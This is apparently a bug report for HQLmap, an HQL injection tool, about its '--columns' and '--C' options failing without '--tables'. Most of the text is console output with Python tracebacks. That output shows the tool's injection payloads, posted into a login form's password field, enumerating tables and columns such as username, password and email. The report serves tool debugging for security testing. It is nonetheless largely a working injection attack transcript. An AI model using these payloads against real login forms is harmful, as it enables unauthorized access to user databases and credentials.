HQLmap
parameter '--columns' and '--C' do not work without parameter '--tables'
Description
There are some logical problems with parameter '--tables'. The problem is just as the issue's title says.
Detail
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 459, in <module>
find_columns(opts.file_column, opts.table)
File "X:\hqlmap\HQLmap.py", line 161, in find_columns
find_column(table_name, column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C hdPassWord
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 471, in <module>
find_column(opts.table, opts.column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --C hdPassWord --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find column hdPassWord for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.hdPassWord%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Hdpassword has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for table com_recruit.entity.sysuser.hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found (again).
Traceback (most recent call last):
File "X:\hqlmap\HQLmap.py", line 459, in <module>
find_columns(opts.file_column, opts.table)
File "X:\hqlmap\HQLmap.py", line 161, in find_columns
find_column(table_name, column)
File "X:\hqlmap\HQLmap.py", line 170, in find_column
raise Exception('Table ' + table + ' does not exist ?')
Exception: Table com_recruit.entity.sysuser.hdzuser does not exist ?
x:\hqlmap>HQLmap.py -v -u "http://hql-injection-site/doSysLogin.action" --data "hdu.hdUsersNmae=admin&hdu.hdPassWord=password&verifyCode=jgnb" -p hdu.hdPassWord --T com_recruit.entity.sysuser.hdzuser --columns --tables
No GET Parameters
POST parameters are present. {'hdu.hdPassWord': 'password', 'hdu.hdUsersNmae': 'admin', 'verifyCode': 'jgnb'}
Trying to gather as much tables..
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+User%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table User does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Task%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Task does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+News%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table News does not exist.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+Test%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[-] Table Test does not exist.
Checking if com_recruit.entity.sysuser.hdzuser exists.
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28%2A%29+from+com_recruit.entity.sysuser.hdzuser%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Table Com_Recruit.Entity.Sysuser.Hdzuser has been found.
Trying to find columns for all tables
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.username%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Username has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.password%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Password has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.status%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Status has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.user_id%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column User_Id has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.email%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Email has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.firstname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Firstname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser
URL : http://hql-injection-site/doSysLogin.action
POSTDATA : hdu.hdPassWord=password%27and+%28select+count%28w.lastname%29+from+Com_Recruit.Entity.Sysuser.Hdzuser+w%29+%3E%3D+0+or+%27%27%3D%27&hdu.hdUsersNmae=admin&verifyCode=jgnb
[!] Column Lastname has been found in table Com_Recruit.Entity.Sysuser.Hdzuser